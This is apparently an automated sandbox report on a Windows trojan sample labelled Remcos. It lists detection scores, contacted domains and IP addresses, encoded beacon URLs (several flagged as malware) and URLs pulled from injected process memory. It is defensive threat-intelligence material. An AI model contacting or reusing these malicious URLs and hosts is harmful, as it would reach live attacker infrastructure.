            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PAGO $830.900.exe62%ReversingLabsByteCode-MSIL.Trojan.Remcos
            PAGO $830.900.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.study-in-nyc.online/f1gw/?x0wHoJ8X=pb7vAMGygCzgil6KiamfOy3VXzA3Xi9sLZv0yqE634qUaLHMRKan/u+F1ZY+Tt/oC7UdlvoT/RR8LwhbhdEc01iOVkBxCirsEav2yzLdi85bfi4XTpXBgVIAsk+0IqZz/w==&2VDlJ=Z2VdhTx0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/197.html0%Avira URL Cloudsafe
            http://www.kexweb.top/3bdq/0%Avira URL Cloudsafe
            http://www.languagemodel.pro/nxfn/0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.40%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css0%Avira URL Cloudsafe
            http://www.jobworklanka.online/ikh0/?2VDlJ=Z2VdhTx&x0wHoJ8X=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1jr66Q514zDlJHSMgPbfeUgvtl8EMtFUh5bwjyzdjbkT63w==0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/198.html0%Avira URL Cloudsafe
            http://www.study-in-nyc.online/f1gw/0%Avira URL Cloudsafe
            http://www.omexai.info/7xi5/?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx100%Avira URL Cloudmalware
            http://www.chinaen.org/lol/200.html0%Avira URL Cloudsafe
            http://www.study-in-nyc.online0%Avira URL Cloudsafe
            http://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx100%Avira URL Cloudmalware
            https://www.htmlit.com.cn/0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.png0%Avira URL Cloudsafe
            http://www.mizuquan.top/e0nr/0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/201.html0%Avira URL Cloudsafe
            https://whois.gandi.net/en/results?search=languagemodel.pro0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/204.html0%Avira URL Cloudsafe
            http://www.chinaen.org/search.php?act=search0%Avira URL Cloudsafe
            http://www.bola88site.one/3qit/0%Avira URL Cloudsafe
            http://www.chinaen.org/mquw/?2VDlJ=Z2VdhTx&x0wHoJ8X=9VhEAk+nBcRFJItebzuYkEWcWYPrTgvEZy86ZzmkaEauDk+ByEDFhBf1SE1efnbmII1/0Q2I2f54RFseImhioiSeit22xDiqKKd7jVQmz4n0QSDnRFZQupGXvMbNczsPDQ==0%Avira URL Cloudsafe
            http://www.sailnway.net/lrst/0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/script/c_html_js_add.php0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css0%Avira URL Cloudsafe
            http://www.languagemodel.pro/nxfn/?2VDlJ=Z2VdhTx&x0wHoJ8X=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVS2aVeWkTweCwbKJYJa5ZpRDYExluaviz3hCAwKYGhMeZlQ==0%Avira URL Cloudsafe
            http://www.kexweb.top/3bdq/?x0wHoJ8X=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4ExiUknvodE5HLMgr3NywByQXC4D0E63F2IS7XJBOJFBCzN3g==&2VDlJ=Z2VdhTx0%Avira URL Cloudsafe
            http://www.dyme.tech/h7lb/0%Avira URL Cloudsafe
            http://www.elsupertodo.net/2jit/100%Avira URL Cloudmalware
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/202.html0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.40%Avira URL Cloudsafe
            http://www.chinaen.org/lol/195.html0%Avira URL Cloudsafe
            http://www.dyme.tech/h7lb/?x0wHoJ8X=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0ZcwmkJbzyfd9szIIrZWt0fsPZoQH+Fzht72KOU0RGBuctA==&2VDlJ=Z2VdhTx0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.css0%Avira URL Cloudsafe
            https://www.gandi.net/en/domain0%Avira URL Cloudsafe
            http://www.chinaen.org/mquw/0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/203.html0%Avira URL Cloudsafe
            http://www.chinaen.org/0%Avira URL Cloudsafe
            http://www.nobartv6.website/pp43/0%Avira URL Cloudsafe
            https://www.zblogcn.com/0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/login.php0%Avira URL Cloudsafe
            http://www.sailnway.net/lrst/?x0wHoJ8X=mDrmkSN/AS2kB6l18epq8nmRkgENFEghmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KQHyUFQSAc8UP525zlOX/aW9T9BNmWB7W/bov9uBpemVAjQ==&2VDlJ=Z2VdhTx0%Avira URL Cloudsafe
            http://www.tekilla.wtf/fpzw/100%Avira URL Cloudmalware
            http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.40%Avira URL Cloudsafe
            http://www.jobworklanka.online/ikh0/0%Avira URL Cloudsafe
            http://www.omexai.info/7xi5/100%Avira URL Cloudmalware
            http://www.tekilla.wtf/fpzw/?2VDlJ=Z2VdhTx&x0wHoJ8X=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV8YvjGskVquY7O4GS1YJERNPT4cclYTval7UCV/4UAiTeAA==100%Avira URL Cloudmalware
            https://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle100%Avira URL Cloudmalware
            http://www.chinaen.org/lol/199.html0%Avira URL Cloudsafe
            http://www.chinaen.org/zb_system/script/zblogphp.js0%Avira URL Cloudsafe
            http://www.chinaen.org/lol/196.html0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.elsupertodo.net
            		148.72.152.174
            		truetrue
              		unknown
              webredir.vip.gandi.net
              		217.70.184.50
              		truetrue
                		unknown
                www.chinaen.org
                		188.114.97.3
                		truetrue
                  		unknown
                  bola88site.one
                  		172.96.191.39
                  		truetrue
                    		unknown
                    www.dyme.tech
                    		13.248.169.48
                    		truetrue
                      		unknown
                      jobworklanka.online
                      		91.184.0.200
                      		truetrue
                        		unknown
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truetrue
                          		unknown
                          www.nobartv6.website
                          		103.224.182.242
                          		truetrue
                            		unknown
                            www.kexweb.top
                            		63.250.47.40
                            		truetrue
                              		unknown
                              www.study-in-nyc.online
                              		13.248.169.48
                              		truetrue
                                		unknown
                                www.mizuquan.top
                                		43.242.202.169
                                		truetrue
                                  		unknown
                                  redirect.3dns.box
                                  		172.191.244.62
                                  		truetrue
                                    		unknown
                                    omexai.info
                                    		3.33.130.190
                                    		truetrue
                                      		unknown
                                      www.tekilla.wtf
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.omexai.info
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.sailnway.net
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.woshop.online
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.languagemodel.pro
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.bola88site.one
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.jobworklanka.online
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.arlon-commerce.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.kxshopmr.store
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.kexweb.top/3bdq/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.languagemodel.pro/nxfn/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.study-in-nyc.online/f1gw/?x0wHoJ8X=pb7vAMGygCzgil6KiamfOy3VXzA3Xi9sLZv0yqE634qUaLHMRKan/u+F1ZY+Tt/oC7UdlvoT/RR8LwhbhdEc01iOVkBxCirsEav2yzLdi85bfi4XTpXBgVIAsk+0IqZz/w==&2VDlJ=Z2VdhTxtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.jobworklanka.online/ikh0/?2VDlJ=Z2VdhTx&x0wHoJ8X=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1jr66Q514zDlJHSMgPbfeUgvtl8EMtFUh5bwjyzdjbkT63w==true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.study-in-nyc.online/f1gw/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.omexai.info/7xi5/?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTxtrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTxtrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.mizuquan.top/e0nr/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/mquw/?2VDlJ=Z2VdhTx&x0wHoJ8X=9VhEAk+nBcRFJItebzuYkEWcWYPrTgvEZy86ZzmkaEauDk+ByEDFhBf1SE1efnbmII1/0Q2I2f54RFseImhioiSeit22xDiqKKd7jVQmz4n0QSDnRFZQupGXvMbNczsPDQ==true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.bola88site.one/3qit/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.sailnway.net/lrst/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.kexweb.top/3bdq/?x0wHoJ8X=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4ExiUknvodE5HLMgr3NywByQXC4D0E63F2IS7XJBOJFBCzN3g==&2VDlJ=Z2VdhTxtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.languagemodel.pro/nxfn/?2VDlJ=Z2VdhTx&x0wHoJ8X=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVS2aVeWkTweCwbKJYJa5ZpRDYExluaviz3hCAwKYGhMeZlQ==true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.dyme.tech/h7lb/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.elsupertodo.net/2jit/true
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.dyme.tech/h7lb/?x0wHoJ8X=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0ZcwmkJbzyfd9szIIrZWt0fsPZoQH+Fzht72KOU0RGBuctA==&2VDlJ=Z2VdhTxtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/mquw/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.nobartv6.website/pp43/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.sailnway.net/lrst/?x0wHoJ8X=mDrmkSN/AS2kB6l18epq8nmRkgENFEghmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KQHyUFQSAc8UP525zlOX/aW9T9BNmWB7W/bov9uBpemVAjQ==&2VDlJ=Z2VdhTxtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.tekilla.wtf/fpzw/true
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.omexai.info/7xi5/true
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.tekilla.wtf/fpzw/?2VDlJ=Z2VdhTx&x0wHoJ8X=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV8YvjGskVquY7O4GS1YJERNPT4cclYTval7UCV/4UAiTeAA==true
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.jobworklanka.online/ikh0/true
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.cssnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://duckduckgo.com/ac/?q=netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.chinaen.org/lol/198.htmlnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.jsnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/lol/197.htmlnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.study-in-nyc.onlineXXOIkqUXwzoOEy.exe, 00000006.00000002.4482452521.0000000004CDD000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.chinaen.org/lol/200.htmlnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.pngnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://whois.gandi.net/en/results?search=languagemodel.pronetbtugc.exe, 00000004.00000002.4481211759.0000000004C30000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.00000000035A0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/lol/201.htmlnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.htmlit.com.cn/netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/lol/204.htmlnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/search.php?act=searchXXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.cssnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/zb_system/script/c_html_js_add.phpnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/lol/195.htmlnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/lol/202.htmlnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/lol/XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.chinaen.org/lol/203.htmlnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.cssnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.gandi.net/en/domainnetbtugc.exe, 00000004.00000002.4481211759.0000000004C30000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.00000000035A0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/zb_system/login.phpnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.zblogcn.com/netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4netbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.elsupertodo.net/2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutlenetbtugc.exe, 00000004.00000002.4481211759.00000000045E8000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000002F58000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2631846308.0000000011598000.00000004.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000003.2526593706.00000000082CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.chinaen.org/lol/199.htmlnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/lol/196.htmlnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.chinaen.org/zb_system/script/zblogphp.jsnetbtugc.exe, 00000004.00000002.4481211759.00000000058C0000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.0000000004230000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        63.250.47.40
                                                        		www.kexweb.topUnited States
                                                        		22612NAMECHEAP-NETUStrue
                                                        13.248.169.48
                                                        		www.dyme.techUnited States
                                                        		16509AMAZON-02UStrue
                                                        91.184.0.200
                                                        		jobworklanka.onlineNetherlands
                                                        		197902HOSTNETNLtrue
                                                        103.224.182.242
                                                        		www.nobartv6.websiteAustralia
                                                        		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                        148.72.152.174
                                                        		www.elsupertodo.netUnited States
                                                        		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                                        85.159.66.93
                                                        		natroredirect.natrocdn.comTurkey
                                                        		34619CIZGITRtrue
                                                        172.191.244.62
                                                        		redirect.3dns.boxUnited States
                                                        		7018ATT-INTERNET4UStrue
                                                        172.96.191.39
                                                        		bola88site.oneCanada
                                                        		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                        188.114.97.3
                                                        		www.chinaen.orgEuropean Union
                                                        		13335CLOUDFLARENETUStrue
                                                        217.70.184.50
                                                        		webredir.vip.gandi.netFrance
                                                        		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
                                                        3.33.130.190
                                                        		omexai.infoUnited States
                                                        		8987AMAZONEXPANSIONGBtrue
                                                        43.242.202.169
                                                        		www.mizuquan.topHong Kong
                                                        		40065CNSERVERSUStrue

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1513227
                                                        Start date and time:2024-09-18 16:16:31 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 11m 20s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:PAGO $830.900.exe
                                                        Detection:MAL
